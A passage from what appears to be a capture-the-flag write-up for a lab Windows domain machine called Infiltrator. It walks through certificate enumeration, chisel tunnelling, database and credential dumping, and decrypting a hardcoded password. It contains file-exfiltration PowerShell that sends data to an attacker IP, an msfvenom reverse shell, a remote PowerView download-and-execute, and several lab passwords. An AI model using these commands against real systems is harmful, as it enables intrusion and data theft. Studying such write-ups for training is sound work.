[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'INFILTRATOR\Domain Computers' has enrollment rights for template 'Machine'
Template Name: Machine
Template distinguishedname: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
[+] Extended Key Usage: Client Authentication, Server Authentication
EnrollmentFlag: AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for: INFILTRATOR\Domain Computers
[?] +++++ Checking Template 'User' +++++
[+] Identity 'INFILTRATOR\Domain Users' has enrollment rights for template 'User'
Template Name: User
Template distinguishedname: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
[+] Extended Key Usage: Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: INFILTRATOR\Domain Users
[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: SubCA
Template distinguishedname: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation: 12/08/2023 01:52:38
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
...
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'infiltrator_svc$':
sAMAccountName: infiltrator_svc$
distinguishedName: CN=infiltrator_svc,CN=Managed Service Accounts,DC=infiltrator,DC=htb
objectSid: S-1-5-21-2606098828-3734741516-3625406802-3102
[+] description: dc01.infiltrator.htb
[+] AllowedToRetrieveManagedPassword: lan_managment
pwdLastSet: 12/10/2023 07:28:23
[*] lastLogonTimestamp: 02/19/2024 04:27:26 (Identity is likely not online anymore!)
userAccountControl: WORKSTATION_TRUST_ACCOUNT
...
Output Messenger (k.turner)
Before we begin the certificate shenanigans, let's go back to k.turner's password. I had discarded the network output of winPEAS, but it actually contains interesting information.
+----------¦ Current TCP Listening Ports
+ Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
...
TCP 0.0.0.0 14126 0.0.0.0 0 Listening 3524 outputmessenger_httpd
TCP 0.0.0.0 14406 0.0.0.0 0 Listening 5692 outputmessenger_mysqld
...
https://support.outputmessenger.com/server-install-faq/

PS C:\Program Files> Get-Acl 'Output Messenger' | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files\Output Messenger
Owner : BUILTIN\Administrators
Group : INFILTRATOR\Domain Users
Access : NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow ReadAndExecute, Synchronize
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:DUD:AI(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
PS C:\Program Files> Get-Acl 'Output Messenger Server' | fl
Get-Acl : Attempted to perform an unauthorized operation.
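The Sddl line above packs the same information as the Access list, and the AddSelf section earlier turns on exactly this kind of ACE detail (Self versus WriteProperty on the member attribute). As an added example that is not part of the writeup, this Python parser decodes SDDL DACLs and answers both questions: who can actually modify the Output Messenger folder (using the page's real SDDL), and whether an ACE on a group amounts to AddMember or AddSelf (using a constructed group DACL; the domain SID and E.rodriguez's RID 1109 come from the RID brute above, RID 9999 is made up).

```python
import re
from dataclasses import dataclass

# Real SDDL: the Get-Acl output above for C:\Program Files\Output Messenger.
OUTPUT_MESSENGER_SDDL = (
    "O:BAG:DUD:AI"
    "(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)"
    "(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)"
    "(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)"
    "(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)"
    "(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)"
    "(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)"
)

# CONSTRUCTED group DACL (not taken from the box): object-specific ACEs scoped to the
# 'member' attribute. RID 1109 is E.rodriguez per the RID brute; RID 9999 is made up.
DOMAIN_SID = "S-1-5-21-2606098828-3734741516-3625406802"
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"  # schemaIDGUID of 'member'
GROUP_SDDL = (
    "O:DAG:DAD:"
    f"(OA;;SW;{MEMBER_ATTR_GUID};;{DOMAIN_SID}-1109)"  # Self on member -> AddSelf
    f"(OA;;WP;{MEMBER_ATTR_GUID};;{DOMAIN_SID}-9999)"  # WriteProperty on member -> AddMember
    "(A;;RPLCLORC;;;AU)"                               # read-only for Authenticated Users
)

# Two-letter SDDL rights codes -> access-mask bits (generic, file-system and DS subsets).
RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "RC": 0x20000, "SD": 0x10000, "WD": 0x40000, "WO": 0x80000,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
# File-system bits that let a trustee change the folder, its DACL or its owner.
FS_WRITE_BITS = 0x2 | 0x4 | 0x10 | 0x100 | 0x10000 | 0x40000 | 0x80000 | RIGHTS["GW"] | RIGHTS["GA"]
TRUSTEES = {
    "BA": "BUILTIN\\Administrators", "BU": "BUILTIN\\Users", "SY": "NT AUTHORITY\\SYSTEM",
    "CO": "CREATOR OWNER", "AC": "ALL APPLICATION PACKAGES", "AU": "Authenticated Users",
    "S-1-15-2-2": "ALL RESTRICTED APPLICATION PACKAGES",
    "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464": "NT SERVICE\\TrustedInstaller",
}
SDDL_RE = re.compile(r"^O:(?P<owner>.+?)G:(?P<group>.+?)D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))+)(?:S:.*)?$")


@dataclass(frozen=True)
class Ace:
    ace_type: str      # A = allow, D = deny, OA/OD = object-specific allow/deny
    flags: frozenset   # CI, OI, IO, ID, ...
    mask: int
    object_guid: str   # empty unless object-specific
    trustee: str       # SID or two-letter alias


def parse_mask(field: str) -> int:
    """Rights are either a hex literal ("0x1200a9") or a run of two-letter codes ("GXGR")."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]  # KeyError on an unknown code is deliberate
    return mask


def parse_sddl(sddl: str):
    m = SDDL_RE.match(sddl)
    if not m:
        raise ValueError("expected an SDDL string with O:, G: and D: sections")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m["aces"]):
        ace_type, flags, rights, obj_guid, _inherit_guid, trustee = body.split(";")[:6]
        aces.append(Ace(ace_type, frozenset(flags[i:i + 2] for i in range(0, len(flags), 2)),
                        parse_mask(rights), obj_guid.lower(), trustee))
    return m["owner"], m["group"], m["flags"], aces


def allowed_mask(aces, trustee: str) -> int:
    """Union of Allow rights on the object itself; inherit-only (IO) ACEs only reach children.
    Deny ACEs are not evaluated (this DACL has none); a full evaluator applies them first."""
    mask = 0
    for a in aces:
        if a.ace_type == "A" and a.trustee == trustee and "IO" not in a.flags:
            mask |= a.mask
    return mask


def trustees_who_can_modify(sddl: str) -> list:
    """Friendly names of every trustee holding a write-class right on the folder itself."""
    _, _, _, aces = parse_sddl(sddl)
    return sorted({TRUSTEES.get(a.trustee, a.trustee) for a in aces
                   if allowed_mask(aces, a.trustee) & FS_WRITE_BITS})


def classify_member_edges(sddl: str) -> dict:
    """trustee -> 'AddMember' or 'AddSelf': the WP-versus-SW distinction from the AddSelf section."""
    _, _, _, aces = parse_sddl(sddl)
    edges = {}
    for a in aces:
        if a.ace_type not in ("A", "OA"):
            continue
        if a.object_guid and a.object_guid != MEMBER_ATTR_GUID:
            continue  # scoped to another attribute; an empty GUID covers all attributes
        if a.mask & (RIGHTS["WP"] | RIGHTS["GW"] | RIGHTS["GA"]):
            edges[a.trustee] = "AddMember"
        elif a.mask & RIGHTS["SW"]:
            edges.setdefault(a.trustee, "AddSelf")
    return edges
```

Running `trustees_who_can_modify(OUTPUT_MESSENGER_SDDL)` confirms what Get-Acl showed: only TrustedInstaller, SYSTEM and Administrators can change the install folder, while BUILTIN\Users is limited to 0x1200a9 (read and execute).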
Install the official Linux client:
└─$ sudo dpkg -i OutputMessenger_amd64.deb
Selecting previously unselected package outputmessenger.
(Reading database ... 535734 files and directories currently installed.)
Preparing to unpack OutputMessenger_amd64.deb ...
Unpacking outputmessenger (2.0.40) ...
Setting up outputmessenger (2.0.40) ...
Processing triggers for kali-menu (2023.4.7) ...
Processing triggers for desktop-file-utils (0.27-1) ...
Processing triggers for mailcap (3.70+nmu1) ...
Time to proxify the connections!
PS C:\Users\M.harris\Music> iwr 10.10.14.43/chisel.exe -outfile chisel.exe
---
└─$ chisel server -p 36000 --reverse
---
# .\chisel.exe client 10.10.14.43:36000 R:14121-14129:localhost:14121-14129
PS C:\Users\M.harris\Music> Start-Job -ScriptBlock { & "C:\Users\M.harris\Music\chisel.exe" client 10.10.14.43:36000 R:14121:localhost:14121 R:14122:localhost:14122 R:14123:localhost:14123 R:14124:localhost:14124 R:14125:localhost:14125 R:14126:localhost:14126 R:14127:localhost:14127 R:14128:localhost:14128 R:14129:localhost:14129 R:14406:localhost:14406; }
---
└─$ outputmessenger
From the future: handling ports was annoying, so just automate it:
netstat -an | Select-String "0.0.0.0:14[0-9]{3}.*LISTENING" | % { $port = $_.ToString().Split()[6].Split(':')[1]; $portString="R:${port}:localhost:${port}"; Start-Job -ScriptBlock { param($portString); & "C:\Users\winrm_svc\Music\chisel.exe" client 10.10.14.43:36000 $portString; } -ArgumentList $portString }
Creds:
k.turner:MessengerApp@Pass!:127.0.0.1


Hidden Files
Previously winPEAS found a hidden directory in /Users:
PS C:\Users> ls '.\All Users\' -force -rec -fil '*.zip' -ErrorAction SilentlyContinue
Directory: C:\Users\All Users\Output Messenger Server\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/19/2024 7:51 AM 15702539 OutputMessengerApache.zip
-a---- 2/19/2024 7:51 AM 25477937 OutputMessengerMysql.zip
-a---- 2/19/2024 7:52 AM 3369187 OutputWall.zip
# Push a file as raw bytes to a TCP listener on the attacker host that saves what it receives to a file
function SendOverTcp {
    param ([string]$server, [int]$port, [string]$filePath)
    $tcpClient = New-Object Net.Sockets.TcpClient($server, $port)
    $stream = $tcpClient.GetStream()
    $bytes = [IO.File]::ReadAllBytes($filePath)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Close()
    $tcpClient.Close()
}
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerApache.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputMessengerMysql.zip"
SendOverTcp "10.10.14.43" 4444 "C:\Users\All Users\Output Messenger Server\Temp\OutputWall.zip"
MySQL
└─$ for file in *.zip; do unzip "$file" -d "${file%.zip}"; done
└─$ pwd && cat OutputMysql.ini
/home//Desktop/Rooms/Infiltrator/all_users_zips/OutputMessengerMysql
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
[PATHCONFIG]
;mysql5.6.17
MySQL=mysql
Log=log
def_conf=settings
MySQL_data=data
Backup=backup
└─$ mysql -P 14406 -u 'root' -p'ibWijteig5'
Server version: 10.1.19-MariaDB mariadb.org binary distribution
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| outputwall |
| performance_schema |
+--------------------+
MariaDB [(none)]> USE outputwall;
MariaDB [outputwall]> SHOW TABLES;
+---------------------------+
| Tables_in_outputwall |
+---------------------------+
| ot_attachment |
| ot_comments |
| ot_entity |
| ot_entity_accounts |
| ot_entity_daysoff |
| ot_entity_setting |
| ot_sessions |
| ot_user_notification_read |
| ot_user_notifications |
| ot_wall_activity |
| ot_wall_favorite |
| ot_wall_notification |
| ot_wall_posts |
| ot_wall_tagmessages |
| ot_wall_tags |
| ot_wall_tokens |
| ot_wall_usermessages |
+---------------------------+
MariaDB [outputwall]> SELECT post_subject, post_message FROM ot_wall_posts \G
*************************** 1. row ***************************
post_subject: UserExplorer app project
post_message: Hey team, I'm here! In this screenshot, I'll guide you through using the app UserExplorer.exe. It works seamlessly with dev credentials, but remember, it's versatile and functions with any credentials. Currently, we're exploring the default option. Stay tuned for more updates!
"UserExplorer.exe -u m.harris -p D3v3l0p3r_Pass@1337! -s M.harris"
*************************** 2. row ***************************
post_subject: Security Alert! Pre-Auth Disabled on kerberos for Some Users
post_message: Hey team,
We've identified a security concern: some users and our domain (dc01.infiltrator.htb) have pre-authentication disabled on kerberos.
No need to panic! Our vigilant team is already on it and will work diligently to fix this. In the meantime, stay vigilant and be cautious about any potential security risks.
2 rows in set (0.078 sec)
Unintended path
You can just read files, lmao
MariaDB [(none)]> SELECT LOAD_FILE('/Users/Administrator/Desktop/root.txt');
+----------------------------------------------------+
| LOAD_FILE('/Users/Administrator/Desktop/root.txt') |
+----------------------------------------------------+
| 483edf74dd53ffbe0eee7fe29c56943b |
+----------------------------------------------------+
Output Messenger (m.harris)
Creds:
m.harris:D3v3l0p3r_Pass@1337!:127.0.0.1

I think the Download button broke because I didn't have a Storage Folder
specified; we can use Download History to get files. Still doesn't work because the app kinda died 💀 Box restart to the rescue.

Decompile the exe with ILSpy or similar; the app is written in C#.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.DirectoryServices;
public class Decryptor {
public static string DecryptString(string key, string cipherText) {
using Aes aes = Aes.Create();
aes.Key = Encoding.UTF8.GetBytes(key);
aes.IV = new byte[16];
ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
using StreamReader streamReader = new StreamReader(stream2);
return streamReader.ReadToEnd();
}
}
internal class LdapApp {
private static void Main(string[] args) {
string path = "LDAP://dc01.infiltrator.htb";
string username = "";
string password = "";
string userToSearch = "";
string username_winrm_scv = "winrm_svc";
string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
for (int i = 0; i < args.Length; i += 2) {
switch (args[i].ToLower()) {
case "-u": username = args[i + 1]; break;
case "-p": password = args[i + 1]; break;
case "-s": userToSearch = args[i + 1]; break;
case "-default":
username = username_winrm_scv;
password = Decryptor.DecryptString("b14ca5898a4e4133bbce2ea2315a1916", cipherText); break;
default: Console.WriteLine($"Invalid argument: {args[i]}"); return;
}
}
if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(userToSearch)) {
Console.WriteLine("Usage: UserExplorer.exe -u <username> -p <password> -s <searchedUsername> [-default]");
Console.WriteLine("To use the default credentials: UserExplorer.exe -default -s userToSearch");
return;
}
try {
Console.WriteLine("Attempting Service Connection...");
DirectoryEntry directoryEntry = new DirectoryEntry(path, username, password);
try {
Console.WriteLine("Service Connection Successful.");
DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry);
try {
directorySearcher.Filter = $"(SAMAccountName={userToSearch})";
Console.WriteLine($"Search for {userToSearch} user...");
SearchResult searchResult = directorySearcher.FindOne();
if (searchResult != null) {
Console.WriteLine("User found. Details:");
DirectoryEntry directoryEntry2 = searchResult.GetDirectoryEntry();
Console.WriteLine(string.Format("Name: {0}", directoryEntry2.Properties["cn"].Value));
Console.WriteLine(string.Format("EmailID: {0}", directoryEntry2.Properties["mail"].Value));
Console.WriteLine(string.Format("Telephone Extension: {0}", directoryEntry2.Properties["telephoneNumber"].Value));
Console.WriteLine(string.Format("Department: {0}", directoryEntry2.Properties["department"].Value));
Console.WriteLine(string.Format("Job Title: {0}", directoryEntry2.Properties["title"].Value));
} else { Console.WriteLine("User not found."); }
} finally { ((IDisposable)directorySearcher)?.Dispose(); }
} finally { ((IDisposable)directoryEntry)?.Dispose(); }
} catch (Exception ex) { Console.WriteLine($"An error occurred: {ex.Message}"); }
}
}
// https://www.programiz.com/online-compiler/878jSU8bZORep
using System;
using System.IO;
using System.Text;
using System.Security.Cryptography;
public class Decryptor {
public static string DecryptString(string key, string cipherText) {
using Aes aes = Aes.Create();
aes.Key = Encoding.UTF8.GetBytes(key);
aes.IV = new byte[16];
ICryptoTransform transform = aes.CreateDecryptor(aes.Key, aes.IV);
using MemoryStream stream = new MemoryStream(Convert.FromBase64String(cipherText));
using CryptoStream stream2 = new CryptoStream(stream, transform, CryptoStreamMode.Read);
using StreamReader streamReader = new StreamReader(stream2);
return streamReader.ReadToEnd();
}
private static void Main(string[] args) {
string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
string key = "b14ca5898a4e4133bbce2ea2315a1916";
string password = Decryptor.DecryptString(key, cipherText);
password = Decryptor.DecryptString(key, password);
Console.WriteLine($"Password: {password}");
}
}
// Password: WinRm@$svc^!^P
evil-winrm (winrm_svc)
Creds:
winrm_svc:WinRm@$svc^!^P
└─$ evil-winrm -i dc01.infiltrator.htb -u winrm_svc -p 'WinRm@$svc^!^P'
Nothing much in the user's directory, but we can log in via the chat app again.


The only other user that has access to the chat is probably A.walker
Chat Logs
winPEAS showed something interesting again in the home directory.
+ Searching hidden files or folders in C:\Users home (can be slow)
+ C:\Users\Default
C:\Users\Default User
C:\Users\All Users
C:\Users\winrm_svc\AppData\Roaming\Output Messenger\SpellCheck
C:\Users\All Users\ntuser.pol
*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OM.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OM.db3 to OM.db3
*Evil-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA> download OT.db3
Info: Downloading C:\Users\winrm_svc\AppData\Roaming\Output Messenger\JAAA\OT.db3 to OT.db3
---
└─$ file *
OM.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 33, database pages 29, cookie 0xf, schema 4, UTF-8, version-valid-for 33
OT.db3: SQLite 3.x database, last written using SQLite version 3008006, page size 1024, file counter 8, database pages 13, cookie 0x6, schema 4, UTF-8, version-valid-for 8

The winrm_svc user has an interesting note too:

lan_managment api key 558R501T5I6024Y8JV3B7KOUN1A518GG
https://support.outputmessenger.com/chat-room-api/#Retrieving_a_chat_room
└─$ curl 'http://localhost:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2018/07/24&todate=2025/07/24' -H 'API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG' -s | jq .logs > logs.html

Hidden chat logs
Creds:
O.martinez:m@rtinez@1996!
The app was acting wacky, and luckily there was a web interface we could use. When going through the chats we see some messages we haven't seen before.

Bruteforce Try
idk My password is a combination of my name and birth year, like username + birthday which is 1999!!
First try at bruteforce:
└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999" >> passwords; done;
└─$ for name in $(grep 'mart' ./kerberos/lists/usernames.txt); do echo "${name}1999\!\!" >> passwords; done;
└─$ netexec smb 10.129.98.160 -u 'O.martinez' -p passwords
... NOTHING ...
She did complain about some site popping up, and her calendar is full of their domain; DNS poisoning to steal the user hash?

Windows Client
Run Application
For whatever the fucking reason, you need to download the Windows client, and then you have access to the new task.

*Evil-WinRM* PS C:\Users\winrm_svc\Documents> upload www/rev.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mkdir /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> mv rev.exe /temp
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> icacls C:\temp /grant 'Everyone:(F)' /T /C
processed file: C:\temp
processed file: C:\temp\rev.exe
Successfully processed 2 files; Failed processing 0 files
First sync the calendar, then set up a new Run Application and run the revshell that exists on the remote system (MIGHT ALSO NEED TO EXIST ON YOUR WINDOWS)

Reverse Shell

PS C:\users\O.martinez> whoami /all
User Name SID
====================== ==============================================
infiltrator\o.martinez S-1-5-21-2606098828-3734741516-3625406802-1106
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Chiefs Marketing Group S-1-5-21-2606098828-3734741516-3625406802-1111 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
This didn't work 🤔
PS C:\users\O.martinez\music> IEX(IWR 10.10.14.43/PowerView.ps1 -UseBasicParsing)
PS C:\users\O.martinez\music> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\O.martinez\music> Set-DomainUserPassword -Identity 'M.harris' -AccountPassword $NewPassword
---
└─$ netexec smb infiltrator.htb -u 'M.harris' -p 'Password123$'
SMB 10.129.13.179 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.13.179 445 DC01 [-] infiltrator.htb\M.harris:Password123$ STATUS_ACCOUNT_RESTRICTION
Since the box revolves around the app, check it for something interesting.
PS C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA> ls 'Received Files' -rec -file
Directory: C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/23/2024 4:10 PM 292244 network_capture_2024.pcapng
Network Capture
Download the file
$server = "10.10.14.43"
$port = 4444
$filePath = "C:\users\O.martinez\appdata\roaming\Output Messenger\FAAA\Received Files\203301\network_capture_2024.pcapng"
$tcpClient = New-Object System.Net.Sockets.TcpClient($server, $port)
$networkStream = $tcpClient.GetStream()
$fileBytes = [System.IO.File]::ReadAllBytes($filePath)
$networkStream.Write($fileBytes, 0, $fileBytes.Length)
$networkStream.Flush()
$networkStream.Close()
$tcpClient.Close()
---
└─$ listen > network_capture_2024.pcapng

└─$ file *
%2f: HTML document, ASCII text
%2f(1): HTML document, ASCII text
%2f(2): HTML document, ASCII text
BitLocker-backup(1).7z: 7-zip archive data, version 0.4
BitLocker-backup.7z: HTML document, ASCII text
change_auth_token: JSON text data
files: HTML document, ASCII text, with very long lines (374)
files(1): HTML document, ASCII text, with very long lines (374)
files(2): HTML document, ASCII text
files(3): HTML document, ASCII text
login: ASCII text, with no line terminators
login(1): HTML document, ASCII text
login(2): HTML document, ASCII text
login(3): HTML document, ASCII text
BitLocker
The archive is password protected, so crack the password:
└─$ 7z2john BitLocker-backup\(1\).7z > bitlocker.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "7z", but the string is also recognized as "7z-opencl"
Use the "--format=7z-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 8 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
zipper (BitLocker-backup(1).7z)
1g 0:00:01:55 DONE (2024-09-03 18:03) 0.008683g/s 48.34p/s 48.34c/s 48.34C/s blacks..spartans
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Recovery key:
650540-413611-429792-307362-466070-397617-148445-087043
Hmmm.... There's also some kind of authorization password

Connection errors
I decided to upgrade to a persistent shell because the connection was not acting nicely.
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4445 -f exe -o rev.exe
---
└─$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 4445
msf6 exploit(multi/handler) > run
And at this moment my box died 🎉
Previously I had a luck-dependent method work, so this time I restarted the box, switched the network adapter from NAT to Bridged and set up ligolo-ng.

Lol, I had problems setting it up so I just went back to Chisel, which works very nicely!
Set up chisel on the remote host, and when you connect to the chat server specify the IP of your attacker box (~kali). Access chain: Host -> Kali -> Victim
Drives Enumeration
Get drives available on system:
PS C:\Users\O.martinez> Get-PSDrive
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
Alias Alias
C 15.07 43.32 FileSystem C:\ Users\O.martinez
Cert Certificate \ CurrentUser
Env Environment
Function Function
HKCU Registry HKEY_CURRENT_USER
HKLM Registry HKEY_LOCAL_MACHINE
Variable Variable
WSMan WSMan
PS C:\Users\O.martinez> Get-Volume
DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining Size
----------- ------------ -------------- --------- ------------ ----------------- ------------- ----
E Unknown Fixed Healthy Unknown 0 B 0 B
C NTFS Fixed Healthy OK 43.32 GB 58.4 GB
PS C:\Users\O.martinez\Music> .\wp.exe | tee-object -filepath wp.log
...
Drives Information
Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
E:\ (Type: Fixed)
...
Services Information
Interesting Services -non Microsoft-
Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
OutputMessengerApache(Output Messenger - Apache)["C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\outputmessenger_httpd.exe" -k runservice] - Auto - Running
Apache/2.4.9 (Win32) PHP/5.5.12
=================================================================================================
OutputMessengerMySQL(Output Messenger - MySQL)["C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\outputmessenger_mysqld.exe" "--defaults-file=C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini" "OutputMessengerMySQL"] - Auto - Running
Output Messenger - MySQL
=================================================================================================
...
Checking write permissions in PATH folders (DLL Hijacking)
Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\
C:\Program Files\Output Messenger Server\Plugins\Output\php\
